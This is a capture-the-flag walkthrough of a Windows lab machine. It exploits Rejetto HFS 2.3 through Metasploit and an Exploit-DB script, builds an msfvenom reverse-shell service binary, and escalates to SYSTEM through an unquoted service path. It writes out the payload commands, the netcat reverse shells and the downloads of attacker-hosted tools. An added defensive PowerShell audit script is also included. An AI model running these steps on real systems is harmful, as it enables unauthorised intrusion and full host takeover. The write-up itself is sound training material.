Another Mr. Robot themed room (even if this one didn’t have as many references to the TV show as the other one). This is a Windows machine; I recently wanted to practice more penetration testing and privilege escalation in a Windows environment, as I didn’t have much experience with it.
Scanning and Enumeration
Nmap scan:
Nmap scan report for ip-10-10-179-216.eu-west-1.compute.internal (10.10.179.216)
Host is up (0.00035s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl           Microsoft SChannel TLS
| fingerprint-strings:
|   TLSSessionReq:
|     i&Tb
|     E,!so
|     steelmountain0
|     230322163145Z
|     230921163145Z0
|     steelmountain0
|     V6oR
|     [fEdC
|     \xd0
|     CXkq
|     v;+&
|     e7t$~Ro
|     $0"0
|     5J=[
|     Al~4
|     >$Uwc
|     \x880v
|     +pI=[
|_    \xc6_
| ssl-cert: Subject: commonName=steelmountain
| Issuer: commonName=steelmountain
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-03-22T16:31:45
| Not valid after:  2023-09-21T16:31:45
| MD5:   136b 0349 1fb8 9444 6b88 e679 30bf e5e8
|_SHA-1: 06d8 12f5 b91e f374 a786 664c 97a6 5fc8 c8f5 b9e7
|_ssl-date: 2023-03-23T16:36:18+00:00; -1s from scanner time.
8080/tcp  open  http          HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49175/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...]

Uptime guess: 0.004 days (since Thu Mar 23 16:30:15 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:c6:3d:67:d3:69 (unknown)
| Names:
|   STEELMOUNTAIN<00>    Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  STEELMOUNTAIN<20>    Flags: <unique><active>
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2023-03-23 16:36:19
|_  start_date: 2023-03-23 16:31:03

TRACEROUTE
HOP RTT      ADDRESS
1   0.35 ms  ip-10-10-179-216.eu-west-1.compute.internal (10.10.179.216)
Exploitation
This scan returned some interesting results; in particular, I noticed two web servers (ports 80 and 8080). The one on port 8080 was a Rejetto HTTP File Server 2.3, and while looking for information about it I found that there is a Metasploit module for it, exploit/windows/http/rejetto_hfs_exec, which I used to get access to the system:
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.200.184:4444
[*] Using URL: http://10.10.200.184:8080/4MqDJUUhdmDN4
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /4MqDJUUhdmDN4
[*] Sending stage (175686 bytes) to 10.10.179.216
[!] Tried to delete %TEMP%\lpjrnIcndES.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.200.184:4444 -> 10.10.179.216:49251) at 2023-03-23 16:56:31 +0000
[*] Server stopped.

meterpreter > getuid
Server username: STEELMOUNTAIN\bill
meterpreter > pwd
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter >
Privilege escalation
To enumerate this Windows machine, I used a PowerShell script called PowerUp, which evaluates a Windows machine for misconfigurations – “PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.”
I downloaded the script from this link.
I uploaded the script via Meterpreter, then opened PowerShell and ran the script:
meterpreter > upload PowerUp.ps1
[*] Uploading  : /root/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /root/PowerUp.ps1 -> PowerUp.ps1
[*] Completed  : /root/PowerUp.ps1 -> PowerUp.ps1
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
[...]
ServiceName    : AdvancedSystemCareService9
Path           : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe; IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart     : True
Name           : AdvancedSystemCareService9
Check          : Unquoted Service Paths
The script found an “Unquoted Service Paths” vulnerability, so it was a matter of taking advantage of that: because the service path is unquoted and contains spaces, Windows tries “C:\Program Files (x86)\IObit\Advanced.exe” before the real binary, so I could upload an executable named “Advanced.exe” into the vulnerable path “C:\Program Files (x86)\IObit\”.
Another important aspect was the CanRestart option being True, because it means this user is allowed to restart the service.
The directory of the application is also writable.
Therefore, I could replace the legitimate application with a malicious one and restart the service, which would run my malicious executable.
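As an added example (not from the original writeup), here is a read-only PowerShell audit that finds the condition PowerUp reported above and prints the fix; it assumes a hardening review from an elevated prompt, and it checks only the broad principals Everyone, BUILTIN\Users and Authenticated Users rather than a specific account such as bill.

```powershell
# Added example, not from the original writeup: audit a host for the misconfiguration
# PowerUp flagged above (unquoted service path with spaces whose lookup directories are
# writable by a broad principal) and print the sc.exe command that quotes the path.
# Read-only; run from an elevated PowerShell during a hardening review.
# Creating a file needs the WriteData/CreateFiles bit (FullControl and Modify include it);
# generic access masks are ignored here (simplifying assumption).
$WriteBit = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
$BroadPrincipals = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users'
function Get-UnquotedServicePath {
    # Services whose image path is not wrapped in quotes yet contains a space
    Get-CimInstance Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } |
        ForEach-Object {
            # Keep only the image path; arguments after .exe are not part of the lookup
            $image = $_.PathName -replace '(?i)(\.exe).*$', '$1'
            $parts = $image -split ' '
            # CreateProcess tries one candidate per space, e.g. C:\Program.exe, then
            # C:\Program Files.exe, then C:\Program Files (x86)\IObit\Advanced.exe
            $candidates = @(1..($parts.Count - 1) | ForEach-Object { ($parts[0..($_ - 1)] -join ' ') + '.exe' })
            [pscustomobject]@{
                Name       = $_.Name
                StartName  = $_.StartName
                PathName   = $_.PathName
                Candidates = $candidates
                FixCommand = "sc.exe config $($_.Name) binPath= `"\`"$image\`"`""
            }
        }
}
function Test-BroadWriteAccess([string]$Directory) {
    # True when a broad principal can create files directly in $Directory.
    # Inherit-only ACEs (e.g. Modify on "subfolders only" at C:\) do not count.
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.PropagationFlags -notmatch 'InheritOnly' -and
            $BroadPrincipals -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights) -band $WriteBit) -ne 0) { return $true }
    }
    return $false
}
foreach ($svc in Get-UnquotedServicePath) {
    $exposed = @($svc.Candidates | Where-Object { Test-BroadWriteAccess (Split-Path -Path $_ -Parent) })
    if ($exposed.Count -gt 0) {
        Write-Output "[!] $($svc.Name) (runs as $($svc.StartName)) has unquoted path: $($svc.PathName)"
        $exposed | ForEach-Object { Write-Output "    writable lookup directory for: $_" }
        Write-Output "    fix: $($svc.FixCommand)"
    }
}
```

The printed fix command is meant to be run from cmd.exe and quotes only the image path, so re-append any service arguments that followed the .exe; the directory ACLs themselves should also be tightened so that non-administrators cannot write under the install folder.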
I started by using msfvenom to generate a reverse shell as a Windows service executable:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.200.184 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
I then uploaded the file:
meterpreter > upload Advanced.exe
meterpreter > mv Advanced.exe C:\\Program\ Files\ (x86)\\IObit\\Advanced.exe
With everything in place, I stopped and restarted the vulnerable service (while a listener was set up on my machine, waiting for the connection):
meterpreter > shell
Process 2232 created.
Channel 7 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\Desktop>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\bill\Desktop>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2284
        FLAGS              :
On the listener’s terminal I got the shell:
root@ip-10-10-200-184:~# nc -nvlp 4443
Listening on [0.0.0.0] (family 0, port 4443)
Connection from 10.10.179.216 49276 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
With that I could easily find the required flags.
Alternative solution – No Metasploit
I also did this machine without using Metasploit; this is the procedure I followed.
There was an exploit for the vulnerable Rejetto HTTP File Server, available on Exploit-DB: Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution.
This exploit allows running a command remotely on the target, so I used it to make the target machine download netcat from my attacking machine and then connect back to me.
I downloaded the exploit, along with a netcat binary that I needed for the target machine.
I amended the script to update the attacker’s IP, the listening port, and the web server port.
I set up a web server that the exploit could use to make the target machine fetch the needed files, and ran the exploit with the simple command:
python Exploit.py <Target IP address> <Target Port Number>
I set up a Python server to make the files available for download:
root@ip-10-10-200-184:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.179.216 - - [23/Mar/2023 17:34:09] "GET /nc.exe HTTP/1.1" 200 -
10.10.179.216 - - [23/Mar/2023 17:34:09] "GET /nc.exe HTTP/1.1" 200 -
(The above output shows two requests from the target, as I had to run the exploit twice.)
This is when I got the shell on the system:
root@ip-10-10-200-184:~# nc -nvlp 4443
Listening on [0.0.0.0] (family 0, port 4443)
Connection from 10.10.179.216 49300 received!
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2E4A-906A

 Directory of C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

03/23/2023  09:56 AM    <DIR>          .
03/23/2023  09:56 AM    <DIR>          ..
03/23/2023  09:56 AM    <DIR>          %TEMP%
02/16/2014  01:58 PM           760,320 hfs.exe
               1 File(s)        760,320 bytes
               3 Dir(s)  44,151,586,816 bytes free

C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
I then uploaded winPEAS from my machine to the target machine using PowerShell:
powershell -c Invoke-WebRequest -Uri "http://10.10.200.184:8000/winPEAS.bat" -OutFile "C:\Users\bill\winpeas.bat"
From here it was pretty much the same process as above: winPEAS alerted me to the unquoted path, I uploaded the payload made with msfvenom, and I stopped and started the affected service to get the root (SYSTEM) shell.